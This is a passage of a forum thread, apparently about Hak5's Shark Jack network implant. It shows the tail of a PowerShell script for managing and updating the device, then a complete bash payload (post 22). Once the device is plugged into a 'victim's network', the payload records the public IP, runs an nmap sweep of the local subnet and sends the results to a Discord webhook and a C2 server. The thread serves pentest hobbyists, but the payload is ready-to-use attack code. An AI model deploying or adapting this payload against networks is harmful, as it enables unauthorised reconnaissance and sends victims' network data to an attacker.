                          N {Write-Host "Not Confirmed!"; $Update_Confirm_Status = 0}
                          Default {Write-Host "No Input detected. Defaulting to NO."; $Update_Confirm_Status = 0}
                      }
                      If ( $Update_Confirm_Status -eq 1 ) {
                          Initialize
                          Write-Host "Wait 5-10 minutes as the Shark Jack flashes the firmware and reboots."
                          Write-Host "DO NOT unplug the device from USB power during this process as doing so will render the device inoperable."
                          Write-Host ""
                          Write-Host "Pushing $BASEFILENAME to SharkJack."
                          scp "$FIRMWARE_FILE" "root`@$SHARKJACK_IP`:/tmp/$BASEFILENAME"
                          Write-Host "Initializing Upgrade.."
                          ssh "root`@$SHARKJACK_IP" "sysupgrade -n /tmp/$BASEFILENAME"
                          Write-Host "Upgrade started.. Waiting 30s.."
                          Start-Sleep -s 30
                          Write-Host "Wait for SharkJack to start in Arming Mode.."
                          Write-Host ""
                          Write-Host "Once SharkJack has shut itself down.. It will reboot."
                          Start-Sleep -s 2;
                          Initialize
                      } Else {
                          Write-Host "Returning to Menu."
                          Start-Sleep -s 2
                          Menu-Function
                      }
                  }
              } Else {
                  Write-Host " Disconnect the SharkJack from the PC OR Set your Internet to"
                  Write-Host " the correct configurations, and try again."
                  Start-Sleep -s 15
              }
          }

          Function Cleanup {
              if (Test-Path $PAYLOADDIR) {
                  Write-Host "Found $PAYLOADDIR.. Removing.."
                  Remove-Item $PAYLOADDIR -Force -Recurse -ErrorAction SilentlyContinue
              }
              if (Test-Path $DIR\sharkjack.sh) {
                  Write-Host "Found sharkjack.sh.. Removing.."
                  Remove-Item $DIR\sharkjack.sh -Force
              }
              if (Test-Path $DIR\$BASEFILENAME) {
                  Write-Host "Found $BASEFILENAME.. Removing.."
                  Remove-Item $DIR\$BASEFILENAME -Force
              }
              if (Test-Path $DIR\payload.sh) {
                  Write-Host "Found payload.sh.. Removing.."
                  Remove-Item $DIR\payload.sh -Force
              }
              Write-Host "Everything cleaned up."
              Start-Sleep -s 2
              Menu-Function
          }

          Function Disabled_Func {
              Write-Host ""
              Write-Host "ERROR: Sorry the Selection you made has been disabled."
              Write-Host "ERROR: Please contact REDD or Hak5 regarding this message."
              Write-Host ""
              Start-Sleep -s 5
              Menu-Function
          }

          Function Menu-Function {
              $MENU_SELECTION = 0
              clear
              Header_Ascii
              $type=Read-Host "
              1 - [D]ownload Payload Library from GitHub
              2 - Install SharkLib to Shark[J]ack
              3 - Remove Shark[L]ib from SharkJack
              4 - [C]opy Payload to SharkJack (Interactive)
              5 - Copy [P]ayload from SharkJack.ps1 Directory
              6 - Connect to SharkJack [S]SH
              7 - Connect to SharkJack [W]eb UI (1.0.1+)
              8 - [U]pdate SharkJack
              9 - [R]emove ALL Downloaded Files
              0 - [E]xit

              Please select a # OR [L]etter and press ENTER"
              Switch ($type){
                  1 {$MENU_SELECTION = 1; Download_Repo}
                  D {$MENU_SELECTION = 1; Download_Repo}
                  2 {$MENU_SELECTION = 1; Disabled_Func}
                  3 {$MENU_SELECTION = 1; Disabled_Func}
                  4 {$MENU_SELECTION = 1; Copy_Payload}
                  C {$MENU_SELECTION = 1; Copy_Payload}
                  5 {$MENU_SELECTION = 1; Copy_Dir_Payload}
                  P {$MENU_SELECTION = 1; Copy_Dir_Payload}
                  6 {$MENU_SELECTION = 1; Connect_SharkJack}
                  S {$MENU_SELECTION = 1; Connect_SharkJack}
                  7 {$MENU_SELECTION = 1; Connect_SharkJack_Web}
                  W {$MENU_SELECTION = 1; Connect_SharkJack_Web}
                  8 {$MENU_SELECTION = 1; Update_SharkJack}
                  U {$MENU_SELECTION = 1; Update_SharkJack}
                  9 {$MENU_SELECTION = 1; Cleanup}
                  R {$MENU_SELECTION = 1; Cleanup}
                  clearssh { $MENU_SELECTION = 1; Clean_Known_Hosts}
                  E { Write-Host "Exiting.. Please Wait."; Exit }
                  0 { Write-Host "Exiting.. Please Wait."; Exit }
              }
          }

          Initialize
          while ($MENU_SELECTION -eq 0) {
              Menu-Function
          }
  22. Nmap Quickscan with Discord Integration (Cleaned & C2 Enabled)

      This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to. The Payload waits for "Internet Connection" to be present. Once Internet Connection is found, It scans the local subnet for any online devices. - While also logging the Public IP of the Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.)

      payload.sh

          #!/bin/bash
          # Title: Nmap Quickscan w/ Discord Integration (Cleaned & C2 Enabled)
          # Author: REDD of Private-Locker
          # Version: 1.3
          #
          # This is a cleaned up output version of the Original Nmap Scan that Hak5 introduces us to.
          # The Payload waits for "Internet Connection" to be present. Once Internet Connection is found,
          # It scans the local subnet for any online devices. - While also logging the Public IP of the
          # Victim's Network (Very useful when you are scanning multiple networks in a short amount of time.)
          #
          # Magenta w/ Yellow ........Waiting for Internet
          # 1st Yellow flashing.......Scanning for Gateway/Subnet
          # Cyan flashing.............Running Nmap scan on x.0/24
          # 2nd Yellow Flashing.......Installing dependencies for Discord Integration
          # Yellow....................Sent to Discord Webhook
          # Blue......................Exfiltrating to C2
          # Red.......................Failed C2/EXFIL/Scanning
          # Green.....................Finished

          # Turn on Discord Integration (Yes = 1, No = 0)
          DISCORD=0
          WEBHOOK='PLACE_DISCORD_WEBHOOK_HERE'
          # Send Loot as File or Plain Messages (File = 1, Messages = 0)
          AS_FILE=0

          if [ -f "/etc/device.config" ]; then
              INITIALIZED=1
          else
              INITIALIZED=0
          fi

          LED SETUP
          NETMODE DHCP_CLIENT
          while ! ifconfig eth0 | grep "inet addr"; do LED Y SOLID; sleep .2; LED M SOLID; sleep .8; done
          URL="http://www.example.com"
          while ! wget $URL -qO /dev/null; do sleep 1; done
          GET_GATEWAY=$(route -n | grep 'UG[ \t]' | awk '{print $2}')
          while [ $GET_GATEWAY == "" ]; do sleep 1; done
          INTERNAL_IP=$(ifconfig | sed -En 's/127.0.0.1//;s/.*inet (addr:)?(([0-9]*\.){3}[0-9]*).*/\2/p')
          SUBNET=$(echo "$GET_GATEWAY" | awk -F"." '{print $1"."$2"."$3".0/24"}')
          CHK_SUB=$(echo $INTERNAL_IP | cut -d"." -f1-3)
          FIN_SUB="${CHK_SUB}.0/24"
          LED ATTACK;
          if [ "$SUBNET" != "$FIN_SUB" ]; then
              LED R FAST;
              sleep 2;
              LED R SOLID;
          else
              # Fix for Timestamp Update
              ntpd -gq;
              sleep 1;
              DATE_FORMAT=$(date '+%m-%d-%Y_%H:%M:%S')
              LOOT_DIR="/root/loot/nmap-diag"
              LOOT_FILE="$LOOT_DIR/diag-${DATE_FORMAT}.txt"
              if [ ! -d "$LOOT_DIR" ]; then
                  mkdir -p "$LOOT_DIR"
              fi
              if [ ! -f "$LOOT_FILE" ]; then
                  touch "$LOOT_FILE"
              fi
              # Get Public IP and run NMAP scan
              PUBLIC_IP=$(wget -q "http://api.ipify.org" -O -)
              printf "\n Public IP: ${PUBLIC_IP}\n Online Devices for ${SUBNET}:\n--------------------------------------------\n\n" >> "$LOOT_FILE"
              LED C VERYFAST
              run_nmap () {
                  nmap -sn --privileged "$SUBNET" --exclude "$INTERNAL_IP" | awk '/Nmap scan report for/{printf " -> ";printf $5;}/MAC Address:/{print " - "substr($0, index($0,$3)) }' >> "$LOOT_FILE"
              }
              run_nmap &
              PID=$!
              while kill -0 "$PID" 2>&1 >/dev/null; do
                  wait $PID
              done
              if [ -s "$LOOT_FILE" ]; then
                  if [ "$DISCORD" == 1 ]; then
                      CURL_CHK=$(which curl)
                      if [ "$CURL_CHK" != "/usr/bin/curl" ]; then
                          LED Y VERYFAST;
                          opkg update;opkg install libcurl curl;
                      fi
                      LED Y SOLID
                      if [ "$AS_FILE" == 1 ]; then
                          FILE=\"$LOOT_FILE\"
                          curl -s -i -H 'Content-Type: multipart/form-data' -F FILE=@$FILE -F 'payload_json={ "wait": true, "content": "Loot has arrived!", "username": "SharkJack" }' $WEBHOOK
                      fi
                      if [ "$AS_FILE" == 0 ]; then
                          while read -r line; do
                              DISCORD_MSG=\"**$line**\"
                              curl -H "Content-Type: application/json" -X POST -d "{\"content\": $DISCORD_MSG}" $WEBHOOK
                          done < "$LOOT_FILE"
                      fi
                      LED G SOLID;sleep 2;
                  fi
                  if [ "$INITIALIZED" == 1 ]; then
                      LED Y SOLID
                      if [ -z "$(pgrep cc-client)" ]; then
                          C2CONNECT
                          while ! pgrep cc-client; do LED B SOLID;sleep .2;LED G SOLID;sleep .8; done
                      fi
                      # Re-issuing C2CONNECT to verify loot push to C2
                      C2CONNECT
                      sleep 2
                      C2EXFIL STRING "${LOOT_FILE}" "Nmap Diagnostic for Network ${SUBNET}"
                      LED M VERYFAST;
                      sleep 2;
                  fi
                  LED FINISH;
              else
                  LED R SOLID;
                  rm -rf "$LOOT_FILE";
              fi
          fi
  23. REDD

    MAC Spoofing

    Uhh you can already change the MAC.. Just needs a work around in the payload..